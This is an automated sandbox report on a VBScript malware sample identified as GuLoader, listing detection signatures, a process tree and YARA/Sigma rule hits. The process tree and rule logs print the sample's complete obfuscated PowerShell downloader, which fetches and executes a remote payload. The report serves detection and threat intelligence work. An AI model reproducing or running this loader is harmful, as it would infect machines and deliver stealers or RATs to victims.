Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
time.vbs

Overview

General Information

Sample name:time.vbs
Analysis ID:1446630
MD5:673fa3ac445c7ae448c49ef3d154b4e8
SHA1:097eaa21e81bf37a12a338e33366d429ef6a2ab9
SHA256:aeda53046f92e6a6f967262130c9238be1107224bd143399e6a66eae7ed2e401
Tags:vbs
Infos:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 6344 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\time.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 2656 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$palaverist = 1;$Massesamfund='Su';$Massesamfund+='bstrin';$Massesamfund+='g';Function Lnkampene($Thurlsvaflers){$Uindfriede=$Thurlsvaflers.Length-$palaverist;For($Thurl=5;$Thurl -lt $Uindfriede;$Thurl+=6){$Tachyglossate+=$Thurlsvaflers.$Massesamfund.Invoke( $Thurl, $palaverist);}$Tachyglossate;}function Kolesterol($Overanxious){& ($Maimedly) ($Overanxious);}$Skovbrandsbekmpelses=Lnkampene ' PremMJule o Ped,zRognfi.artel RicilRepleaAphan/ Pr n5Wardl. Cong0Co ta T,ead(AkupuWF,rjti Cottn TeledClarioentrewAnke sPetio Ti.baNEnknnTComp Kad,1Fejll0 Korp. Bro.0 Pul ;Logpe OffsW Dispipleninbasen6 avin4Korri;stemm Ha.ndx Unfr6,irkl4Sm,ak;Aflev DefenrInfervBedk :lokal1 Baml2Asbes1Frais.Alumi0Palp )Gastr subgeG,retse a,tncSlavekAmideoScann/Pec,i2Und r0Disma1 Co.n0Cornc0 ispr1belly0 Naup1Partr TretFTroeliPanglrDeprae Pne fjowl o DrabxGadef/suffl1 Rrbl2E,nea1Dbend.Rele,0Semic ';$Organismers=Lnkampene 'LigegU ,anks An,meFolier,krob-EquivA Ibr gWalloeDetonnChamotBedri ';$Skadevolderne=Lnkampene 'VizirhRashnt MigatF gtip.imels Frem:Kampe/Nonou/SolsowDisc,wMinidwDelag.WardesRidese ExtonS ippdRungesLyterpPostiaSten cLegate Bo t.Sup rcretroo.etalmS.kbr/SalvapK,ansr W leoSchan/Psychd RedelMezzo/LyspaeBl,nhx alstwSlage2LungeoHomel1foreg ';$Malaxate=Lnkampene 'D.bri>Fiske ';$Maimedly=Lnkampene 'mudpuiPadeye.rescx Te.t ';$Whammo='impery';Kolesterol (Lnkampene ' TheoSFamile.ranstDomi,-Ac,taC,pplioDiskrn C tot,lackeThecon ,icht Mou Cento-NontrPSe.dea R.trtUnic,hGynan MangT fies: Adt.\H.ftaMTrafiu GuldfShapefkasseeRekrnnFinge. PromtFore xstat,tGaypo Ylvas-KorreVCr noaHypotlCatheudrueme Ko,p Comm,$BeredWVl inhBass.aVedhnmSubsum somo Raas;Semi ');Kolesterol (Lnkampene 'Whem iEft rf Reti Skygg(Arakatmajore attsAm,hit Alek- ,ardpH,rdsa AgritSnorehImpli ProduTWhore:Fragr\,eostMSarkouE,spafMon,pf Gen,eTilsknOpede. fragtHa.tixFarvetgadsh)Symph{Telefe BltexBloduiDisoctLeean}.rysa;Humbu ');$Prevascular = Lnkampene 'StabieGstelc RegnhS.lkeo Harm Vi.r%For.ba SolcpSamkvpU valdFondsa.rejetDet,eaTilen%Redef\Pi.trO Pri.mArcanrZoogry Bills ortrtMaskinkarnfiA,lurn,ragmgFo,egeCatchrUnbeg.HoundD Limai NoelmRavne Ste.b&Tragt&divel PseudePaatrc Etceh halvoBlee, met o$Krmme ';Kolesterol (Lnkampene ' m gg$RestagForfilSnippoCos.obForfaa Leg,lBerbe:UbetnB DehonEksp.kBordee Su.e=Aphel(DriftcSydamm ComidB dki ,iffi/Ha rscGenio Fuldb$FaysgPTot,lrPrepse HepavVerdeaUdstrsSnrencBrudeuBallalconseaMilitrAfnaz)Foreb ');Kolesterol (Lnkampene 'Sving$ironwg InvelMe,leos,minbAm,era ,utrlbille:Mi,stRwrigluAnt oftos afAffete,lammrFrasesprotokhypere,ontrrInte.= Read$ OverSMaterkHul,oaRetssdIncepeVo.acvBesk,o .analenergd EnlaeTubulrK nnen S,ogeAnglo.s.lgssNeocopOpa tloprekiTheoptCalli( Syst$ UpheMAttacaCaddilBabelaBorttxKr dsaInfertPrakteT.kpr)isog, ');$Skadevolderne=$Ruffersker[0];Kolesterol (Lnkampene ',arte$SaloogBerunl Sorto,pisubtempeaCaliflP egr: ForsB ExciaWheredmoluciOdzoonCingueEnstauDjellrBonde=GleamN ,elfe Bifew So.a-ugestOU.derb DisejAbeloe SunbcBlowjtGerha Re,seSFrejdy Knogs NatitDuk,eeDro.dmBacch.UnderNBilleePa,aptRedis.ThwarWConiieCholebBetteCChatslanth.iExempeRig enGapgltLov,a ');Kolesterol (Lnkampene 'Desig$ForreBudebla IsocdCitesiTil,sn.edaleCyb ruS kverUbluf.S.preH.gtnie,inteaSpe,edPateteBur.nrskadesBayon[Alask$LedigOOdinerTapisgNonapaVindknDe peiS rensspecim FruieCenterDegassGuilb],perm=kiloc$.edboScapsikGldssoSicklvU rembWrestrHusblas,phonD.moud Un,vssearcbLindgePlangk ParamCalvipTallie Ruinl ProtsReklaeRinghs Sg,f ');$Frakoblende127=Lnkampene 'ImproBSightaS.vsadAntipi MetanNonane Ejeru .uggr Spil. skraDKraknoGemenwAntipn eroslOutfeo BefuaShakedVerruFNintui Armel A.paeDebat(Wilda$S.ineSBe prkB rdsaPhoohd Evo eTre jvtjeneoSl,evl AdjodByzaneDamebrStboln.ofdieSemim,Spytk$HumorEFin.nk C,rbvPi.laiBougap Afmae avebr Fyrai SikanMutedgM more Strar Goddn,uneneConfu)Bespn ';$Frakoblende127=$Bnke[1]+$Frakoblende127;$Ekviperingerne=$Bnke[0];Kolesterol (Lnkampene 'Reall$HerlugThur,lTrommoSkrmsbGammiaKltrildrjed:UdspeVKansaichurrnToxicd timaiElektggyrit=Trill(WeheeT gemme.italsCapybtP.rli- ,ccePrevisaSti.ltGevanhPeyot Parce$KosttE Bi lkBodgev JyndikailypProdue,rallrUnm.diN.nrenSammegEnd ce HashrGliomnUndereGymno)Desme ');while (!$Vindig) {Kolesterol (Lnkampene 'Merce$Pr vagPrdiklClisto Forkb rieaTra dl .els:BeskyVHydr.eUnionn ranstBedvee PallkS mfuj.pgatoSrge.lUneneeBintjnmegal= Fjo.$ sandt,dblor efreuTaleseampli ') ;Kolesterol $Frakoblende127;Kolesterol (Lnkampene 'TilskSRokketNed,uaUlde r,emictlanda-HimmeS WicklPurpoeU,frseAct,apProvi L.ndb4Ajour ');Kolesterol (Lnkampene 'Mo.he$Impovg Unf l Mo,ioS.bpebGryntaFibr lBromi: U,ivVSlubriStuklnOmbindHyperiDrivag.egit= .ost(T,vemTAtom e andos ,vertVandi-JenkrPtjeneaReamatHamsthOvers Bj.ne$Hyp,nEKolpokRegulvlameligolilpSangveFolkerC ickiJordrnNelisgCeremeMultirTi lbn AfdeePet r)Pre.u ') ;Kolesterol (Lnkampene 'Odori$AgerbgSubselO teto S,deb,orinaMonumlS mme:KbekrRMgle.eStibis Tobau Fin,sDrbercMontiiR.sertSeksuaInvesnHi.litKeram=Kroni$TaktrgRagsolGenn,oWiyatbSt,afaRygsjlF.lde:S udrRv,rmoeUnchasSqualpHenwois.ederKedloaUdtaltBrevaiBo,ennDisarg aafr+ Cho,+Antih%antia$Unsq R PaksuOmgrdfUnfu.fEngleeReindrRetrosKonsuk Socee IrrerTakah.EuklicKo.stoFeticusank,nRingetFr,ss ') ;$Skadevolderne=$Ruffersker[$Resuscitant];}$Stealth=317356;$Smeltediglen=28607;Kolesterol (Lnkampene 'Col,u$,flivgs,ratlExploo La,hbBarosaP,olol,arco:Hvse.ORunprlMindaeRundsrtetr.aNonadcOmegneNdri,oCaud uSav ns,arbu Circu=bred, TiltnGundereover.tOrals-HaglsCTmreroClinon CenttTilfleVedrrnKle,itPromo Caram$Pale.ESaarsk ForkvTophaiForsmpExte eMoralr,kudsi.rasonTugbog.himoeKommir ondenSubtoecoutu ');Kolesterol (Lnkampene 'Nonme$.dsmigDej klUnle oforskbSheeta Tastl A lg:,nkebL Bru,hD nskuPostonAbe,idScolys Srad ,ejlt=Kasta Subst[GalloS.havayMaksisGradst T aneS ejlmI.elr.Ol erC EchooPsam,n,olkevAprjteApinarNoum tPrees] Vege:Local:Cal,rFBjninrDekreo Ald mEp,ncB NaiaaU,ryksUlykkeUnseg6Laund4 ,estSM.nottOmnidr CohoiJambonFaraog efor(udl,d$.atonOIsokol usleFrontr.elata Aktic SpoueCesiuo ligauTotemsBar.e) Bac. ');Kolesterol (Lnkampene 'Ae th$.rikkg,arbel .eneo KontbVa.utaSu lelBlomk:Pr,nkSRgforuTiskdbBalkogS.btrr AberoUnoveuYeastpMicrosNeome B ill=Slag, Unsto[Dia,lS Metoy boghsEx,ostForbee Ka fmDr.ek.OsteaT Safte.refaxBundgtSyndi.Une.tE,erminIndimcR sunoJessed ForniFlodhn R,tigArcad]Bygrn:Speci:FlugtA adipSStrobCBemgtIRadenI.lust.EkspeG ipleI,hestGydn,SSpredtGrantr ,ppliDeas,nChmilgPo en(Besla$ BlodL Tr,ahDemaruBa.esnKnowhdBade.sKunde)V,rol ');Kolesterol (Lnkampene 't.esi$PreregKvidrlNo.imo PrisbJawfia Thi,l Eksp:Cru hKL.skojBrugeoM,saprorbict Lys eTrundlT legeBlanknSinapsVel,e=Su,er$.egadSW.incuSoffibResergBrachrPannio.ejdiuEnceppDecigs Avis. SpaesN ggauCominbDagsrs ap ltP,ilorFre riIdocrnHabi.gConse(Kobiu$ KribSPo emt.lpaseSothiaPrelalSto it S rahInte ,Kumme$T.bleSMonosmR,esueAfkorlN.ttetEfterePrveld K.ruiMethagNukasl Sowde Inven,uleb)Modta ');Kolesterol $Kjortelens;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6316 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Omrystninger.Dim && echo $" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 6536 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$palaverist = 1;$Massesamfund='Su';$Massesamfund+='bstrin';$Massesamfund+='g';Function Lnkampene($Thurlsvaflers){$Uindfriede=$Thurlsvaflers.Length-$palaverist;For($Thurl=5;$Thurl -lt $Uindfriede;$Thurl+=6){$Tachyglossate+=$Thurlsvaflers.$Massesamfund.Invoke( $Thurl, $palaverist);}$Tachyglossate;}function Kolesterol($Overanxious){& ($Maimedly) ($Overanxious);}$Skovbrandsbekmpelses=Lnkampene ' PremMJule o Ped,zRognfi.artel RicilRepleaAphan/ Pr n5Wardl. Cong0Co ta T,ead(AkupuWF,rjti Cottn TeledClarioentrewAnke sPetio Ti.baNEnknnTComp Kad,1Fejll0 Korp. Bro.0 Pul ;Logpe OffsW Dispipleninbasen6 avin4Korri;stemm Ha.ndx Unfr6,irkl4Sm,ak;Aflev DefenrInfervBedk :lokal1 Baml2Asbes1Frais.Alumi0Palp )Gastr subgeG,retse a,tncSlavekAmideoScann/Pec,i2Und r0Disma1 Co.n0Cornc0 ispr1belly0 Naup1Partr TretFTroeliPanglrDeprae Pne fjowl o DrabxGadef/suffl1 Rrbl2E,nea1Dbend.Rele,0Semic ';$Organismers=Lnkampene 'LigegU ,anks An,meFolier,krob-EquivA Ibr gWalloeDetonnChamotBedri ';$Skadevolderne=Lnkampene 'VizirhRashnt MigatF gtip.imels Frem:Kampe/Nonou/SolsowDisc,wMinidwDelag.WardesRidese ExtonS ippdRungesLyterpPostiaSten cLegate Bo t.Sup rcretroo.etalmS.kbr/SalvapK,ansr W leoSchan/Psychd RedelMezzo/LyspaeBl,nhx alstwSlage2LungeoHomel1foreg ';$Malaxate=Lnkampene 'D.bri>Fiske ';$Maimedly=Lnkampene 'mudpuiPadeye.rescx Te.t ';$Whammo='impery';Kolesterol (Lnkampene ' TheoSFamile.ranstDomi,-Ac,taC,pplioDiskrn C tot,lackeThecon ,icht Mou Cento-NontrPSe.dea R.trtUnic,hGynan MangT fies: Adt.\H.ftaMTrafiu GuldfShapefkasseeRekrnnFinge. PromtFore xstat,tGaypo Ylvas-KorreVCr noaHypotlCatheudrueme Ko,p Comm,$BeredWVl inhBass.aVedhnmSubsum somo Raas;Semi ');Kolesterol (Lnkampene 'Whem iEft rf Reti Skygg(Arakatmajore attsAm,hit Alek- ,ardpH,rdsa AgritSnorehImpli ProduTWhore:Fragr\,eostMSarkouE,spafMon,pf Gen,eTilsknOpede. fragtHa.tixFarvetgadsh)Symph{Telefe BltexBloduiDisoctLeean}.rysa;Humbu ');$Prevascular = Lnkampene 'StabieGstelc RegnhS.lkeo Harm Vi.r%For.ba SolcpSamkvpU valdFondsa.rejetDet,eaTilen%Redef\Pi.trO Pri.mArcanrZoogry Bills ortrtMaskinkarnfiA,lurn,ragmgFo,egeCatchrUnbeg.HoundD Limai NoelmRavne Ste.b&Tragt&divel PseudePaatrc Etceh halvoBlee, met o$Krmme ';Kolesterol (Lnkampene ' m gg$RestagForfilSnippoCos.obForfaa Leg,lBerbe:UbetnB DehonEksp.kBordee Su.e=Aphel(DriftcSydamm ComidB dki ,iffi/Ha rscGenio Fuldb$FaysgPTot,lrPrepse HepavVerdeaUdstrsSnrencBrudeuBallalconseaMilitrAfnaz)Foreb ');Kolesterol (Lnkampene 'Sving$ironwg InvelMe,leos,minbAm,era ,utrlbille:Mi,stRwrigluAnt oftos afAffete,lammrFrasesprotokhypere,ontrrInte.= Read$ OverSMaterkHul,oaRetssdIncepeVo.acvBesk,o .analenergd EnlaeTubulrK nnen S,ogeAnglo.s.lgssNeocopOpa tloprekiTheoptCalli( Syst$ UpheMAttacaCaddilBabelaBorttxKr dsaInfertPrakteT.kpr)isog, ');$Skadevolderne=$Ruffersker[0];Kolesterol (Lnkampene ',arte$SaloogBerunl Sorto,pisubtempeaCaliflP egr: ForsB ExciaWheredmoluciOdzoonCingueEnstauDjellrBonde=GleamN ,elfe Bifew So.a-ugestOU.derb DisejAbeloe SunbcBlowjtGerha Re,seSFrejdy Knogs NatitDuk,eeDro.dmBacch.UnderNBilleePa,aptRedis.ThwarWConiieCholebBetteCChatslanth.iExempeRig enGapgltLov,a ');Kolesterol (Lnkampene 'Desig$ForreBudebla IsocdCitesiTil,sn.edaleCyb ruS kverUbluf.S.preH.gtnie,inteaSpe,edPateteBur.nrskadesBayon[Alask$LedigOOdinerTapisgNonapaVindknDe peiS rensspecim FruieCenterDegassGuilb],perm=kiloc$.edboScapsikGldssoSicklvU rembWrestrHusblas,phonD.moud Un,vssearcbLindgePlangk ParamCalvipTallie Ruinl ProtsReklaeRinghs Sg,f ');$Frakoblende127=Lnkampene 'ImproBSightaS.vsadAntipi MetanNonane Ejeru .uggr Spil. skraDKraknoGemenwAntipn eroslOutfeo BefuaShakedVerruFNintui Armel A.paeDebat(Wilda$S.ineSBe prkB rdsaPhoohd Evo eTre jvtjeneoSl,evl AdjodByzaneDamebrStboln.ofdieSemim,Spytk$HumorEFin.nk C,rbvPi.laiBougap Afmae avebr Fyrai SikanMutedgM more Strar Goddn,uneneConfu)Bespn ';$Frakoblende127=$Bnke[1]+$Frakoblende127;$Ekviperingerne=$Bnke[0];Kolesterol (Lnkampene 'Reall$HerlugThur,lTrommoSkrmsbGammiaKltrildrjed:UdspeVKansaichurrnToxicd timaiElektggyrit=Trill(WeheeT gemme.italsCapybtP.rli- ,ccePrevisaSti.ltGevanhPeyot Parce$KosttE Bi lkBodgev JyndikailypProdue,rallrUnm.diN.nrenSammegEnd ce HashrGliomnUndereGymno)Desme ');while (!$Vindig) {Kolesterol (Lnkampene 'Merce$Pr vagPrdiklClisto Forkb rieaTra dl .els:BeskyVHydr.eUnionn ranstBedvee PallkS mfuj.pgatoSrge.lUneneeBintjnmegal= Fjo.$ sandt,dblor efreuTaleseampli ') ;Kolesterol $Frakoblende127;Kolesterol (Lnkampene 'TilskSRokketNed,uaUlde r,emictlanda-HimmeS WicklPurpoeU,frseAct,apProvi L.ndb4Ajour ');Kolesterol (Lnkampene 'Mo.he$Impovg Unf l Mo,ioS.bpebGryntaFibr lBromi: U,ivVSlubriStuklnOmbindHyperiDrivag.egit= .ost(T,vemTAtom e andos ,vertVandi-JenkrPtjeneaReamatHamsthOvers Bj.ne$Hyp,nEKolpokRegulvlameligolilpSangveFolkerC ickiJordrnNelisgCeremeMultirTi lbn AfdeePet r)Pre.u ') ;Kolesterol (Lnkampene 'Odori$AgerbgSubselO teto S,deb,orinaMonumlS mme:KbekrRMgle.eStibis Tobau Fin,sDrbercMontiiR.sertSeksuaInvesnHi.litKeram=Kroni$TaktrgRagsolGenn,oWiyatbSt,afaRygsjlF.lde:S udrRv,rmoeUnchasSqualpHenwois.ederKedloaUdtaltBrevaiBo,ennDisarg aafr+ Cho,+Antih%antia$Unsq R PaksuOmgrdfUnfu.fEngleeReindrRetrosKonsuk Socee IrrerTakah.EuklicKo.stoFeticusank,nRingetFr,ss ') ;$Skadevolderne=$Ruffersker[$Resuscitant];}$Stealth=317356;$Smeltediglen=28607;Kolesterol (Lnkampene 'Col,u$,flivgs,ratlExploo La,hbBarosaP,olol,arco:Hvse.ORunprlMindaeRundsrtetr.aNonadcOmegneNdri,oCaud uSav ns,arbu Circu=bred, TiltnGundereover.tOrals-HaglsCTmreroClinon CenttTilfleVedrrnKle,itPromo Caram$Pale.ESaarsk ForkvTophaiForsmpExte eMoralr,kudsi.rasonTugbog.himoeKommir ondenSubtoecoutu ');Kolesterol (Lnkampene 'Nonme$.dsmigDej klUnle oforskbSheeta Tastl A lg:,nkebL Bru,hD nskuPostonAbe,idScolys Srad ,ejlt=Kasta Subst[GalloS.havayMaksisGradst T aneS ejlmI.elr.Ol erC EchooPsam,n,olkevAprjteApinarNoum tPrees] Vege:Local:Cal,rFBjninrDekreo Ald mEp,ncB NaiaaU,ryksUlykkeUnseg6Laund4 ,estSM.nottOmnidr CohoiJambonFaraog efor(udl,d$.atonOIsokol usleFrontr.elata Aktic SpoueCesiuo ligauTotemsBar.e) Bac. ');Kolesterol (Lnkampene 'Ae th$.rikkg,arbel .eneo KontbVa.utaSu lelBlomk:Pr,nkSRgforuTiskdbBalkogS.btrr AberoUnoveuYeastpMicrosNeome B ill=Slag, Unsto[Dia,lS Metoy boghsEx,ostForbee Ka fmDr.ek.OsteaT Safte.refaxBundgtSyndi.Une.tE,erminIndimcR sunoJessed ForniFlodhn R,tigArcad]Bygrn:Speci:FlugtA adipSStrobCBemgtIRadenI.lust.EkspeG ipleI,hestGydn,SSpredtGrantr ,ppliDeas,nChmilgPo en(Besla$ BlodL Tr,ahDemaruBa.esnKnowhdBade.sKunde)V,rol ');Kolesterol (Lnkampene 't.esi$PreregKvidrlNo.imo PrisbJawfia Thi,l Eksp:Cru hKL.skojBrugeoM,saprorbict Lys eTrundlT legeBlanknSinapsVel,e=Su,er$.egadSW.incuSoffibResergBrachrPannio.ejdiuEnceppDecigs Avis. SpaesN ggauCominbDagsrs ap ltP,ilorFre riIdocrnHabi.gConse(Kobiu$ KribSPo emt.lpaseSothiaPrelalSto it S rahInte ,Kumme$T.bleSMonosmR,esueAfkorlN.ttetEfterePrveld K.ruiMethagNukasl Sowde Inven,uleb)Modta ');Kolesterol $Kjortelens;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 2664 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Omrystninger.Dim && echo $" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 3688 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.2318228321.0000000005E94000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
    00000004.00000002.2325090155.0000000008B80000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
      00000001.00000002.2672896517.0000015C3E291000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
        00000004.00000002.2329721255.000000000CC2B000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          Process Memory Space: powershell.exe PID: 2656JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Click to see the 3 entries

            Other

            SourceRuleDescriptionAuthorStrings
            amsi64_2656.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
              amsi64_2656.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0xffa3:$b2: ::FromBase64String(
              • 0xd34e:$s1: -join
              • 0x6afa:$s4: +=
              • 0x6bbc:$s4: +=
              • 0xade3:$s4: +=
              • 0xcf00:$s4: +=
              • 0xd1ea:$s4: +=
              • 0xd330:$s4: +=
              • 0xf579:$s4: +=
              • 0xf5f9:$s4: +=
              • 0xf6bf:$s4: +=
              • 0xf73f:$s4: +=
              • 0xf915:$s4: +=
              • 0xf999:$s4: +=
              • 0xda62:$e4: Get-WmiObject
              • 0xdc51:$e4: Get-Process
              • 0xdca9:$e4: Start-Process
              amsi32_6536.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0xff04:$b2: ::FromBase64String(
              • 0xd34e:$s1: -join
              • 0x6afa:$s4: +=
              • 0x6bbc:$s4: +=
              • 0xade3:$s4: +=
              • 0xcf00:$s4: +=
              • 0xd1ea:$s4: +=
              • 0xd330:$s4: +=
              • 0xf579:$s4: +=
              • 0xf5f9:$s4: +=
              • 0xf6bf:$s4: +=
              • 0xf73f:$s4: +=
              • 0xf915:$s4: +=
              • 0xf999:$s4: +=
              • 0xda62:$e4: Get-WmiObject
              • 0xdc51:$e4: Get-Process
              • 0xdca9:$e4: Start-Process
              • 0x17909:$e4: Get-Process

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: WScript or CScript Dropper
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\time.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\time.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\time.vbs", ProcessId: 6344, ProcessName: wscript.exe
              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\time.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\time.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\time.vbs", ProcessId: 6344, ProcessName: wscript.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$palaverist = 1;$Massesamfund='Su';$Massesamfund+='bstrin';$Massesamfund+='g';Function Lnkampene($Thurlsvaflers){$Uindfriede=$Thurlsvaflers.Length-$palaverist;For($Thurl=5;$Thurl -lt $Uindfriede;$Thurl+=6){$Tachyglossate+=$Thurlsvaflers.$Massesamfund.Invoke( $Thurl, $palaverist);}$Tachyglossate;}function Kolesterol($Overanxious){& ($Maimedly) ($Overanxious);}$Skovbrandsbekmpelses=Lnkampene ' PremMJule o Ped,zRognfi.artel RicilRepleaAphan/ Pr n5Wardl. Cong0Co ta T,ead(AkupuWF,rjti Cottn TeledClarioentrewAnke sPetio Ti.baNEnknnTComp Kad,1Fejll0 Korp. Bro.0 Pul ;Logpe OffsW Dispipleninbasen6 avin4Korri;stemm Ha.ndx Unfr6,irkl4Sm,ak;Aflev DefenrInfervBedk :lokal1 Baml2Asbes1Frais.Alumi0Palp )Gastr subgeG,retse a,tncSlavekAmideoScann/Pec,i2Und r0Disma1 Co.n0Cornc0 ispr1belly0 Naup1Partr TretFTroeliPanglrDeprae Pne fjowl o DrabxGadef/suffl1 Rrbl2E,nea1Dbend.Rele,0Semic ';$Organismers=Lnkampene 'LigegU ,anks An,meFolier,krob-EquivA Ibr gWalloeDetonnChamotBedri ';$Skadevolderne=Lnkampene 'VizirhRashnt MigatF gtip.imels Frem:Kampe/Nonou/SolsowDisc,wMinidwDelag.WardesRidese ExtonS ippdRungesLyterpPostiaSten cLegate Bo t.Sup rcretroo.etalmS.kbr/SalvapK,ansr W leoSchan/Psychd RedelMezzo/LyspaeBl,nhx alstwSlage2LungeoHomel1foreg ';$Malaxate=Lnkampene 'D.bri>Fiske ';$Maimedly=Lnkampene 'mudpuiPadeye.rescx Te.t ';$Whammo='impery';Kolesterol (Lnkampene ' TheoSFamile.ranstDomi,-Ac,taC,pplioDiskrn C tot,lackeThecon ,icht Mou Cento-NontrPSe.dea R.trtUnic,hGynan MangT fies: Adt.\H.ftaMTrafiu GuldfShapefkasseeRekrnnFinge. PromtFore xstat,tGaypo Ylvas-KorreVCr noaHypotlCatheudrueme Ko,p Comm,$BeredWVl inhBass.aVedhnmSubsum somo Raas;Semi ');Kolesterol (Lnkampene 'Whem iEft rf Reti Skygg(Arakatmajore attsAm,hit Alek- ,ardpH,rdsa AgritSnorehImpli ProduTWhore:Fragr\,eostMSarkouE,spafMon,pf Gen,eTilsknOpede. fragtHa.tixFarvetgadsh)Symph{Telefe BltexBloduiDisoctLeean}.rysa;Humbu ');$Prevascular = Lnkampene 'StabieGstelc RegnhS.lkeo Harm Vi.r%For.ba SolcpSamkvpU valdFondsa.rejetDet,eaTilen%Redef\Pi.trO Pri.mArcanrZoogry Bills ortrtMaskinkarnfiA,lurn,ragmgFo,egeCatchrUnbeg.HoundD Limai NoelmRavne Ste.b&Tragt&divel PseudePaatrc Etceh halvoBlee, met o$Krmme ';Kolesterol (Lnkampene ' m gg$RestagForfilSnippoCos.obForfaa Leg,lBerbe:UbetnB DehonEksp.kBordee Su.e=Aphel(DriftcSydamm ComidB dki ,iffi/Ha rscGenio Fuldb$FaysgPTot,lrPrepse HepavVerdeaUdstrsSnrencBrudeuBallalconseaMilitrAfnaz)Foreb ');Kolesterol (Lnkampene 'Sving$ironwg InvelMe,leos,minbAm,era ,utrlbille:Mi,stRwrigluAnt oftos afAffete,lammrFrasesprotokhypere,ontrrInte.= Read$ OverSMaterkHul,oaRetssdIncepeVo.acvBesk,o .analenergd EnlaeTubulrK nnen S,ogeAnglo.s.lgssNeocopOpa tloprekiTheoptCalli( Syst$ UpheMAttacaCaddilBabelaBorttxKr dsaInfertPrakteT.kpr)isog, ');$Skadevolderne=$Ruffersker[0];Kolesterol (Lnkampene ',arte$SaloogBerunl Sorto,pisubtempeaCaliflP egr: ForsB ExciaWheredmoluciOdzoonCingueEnstauDjellrBonde=GleamN ,elfe Bifew So.a-ugestOU.d

              Snort Signatures

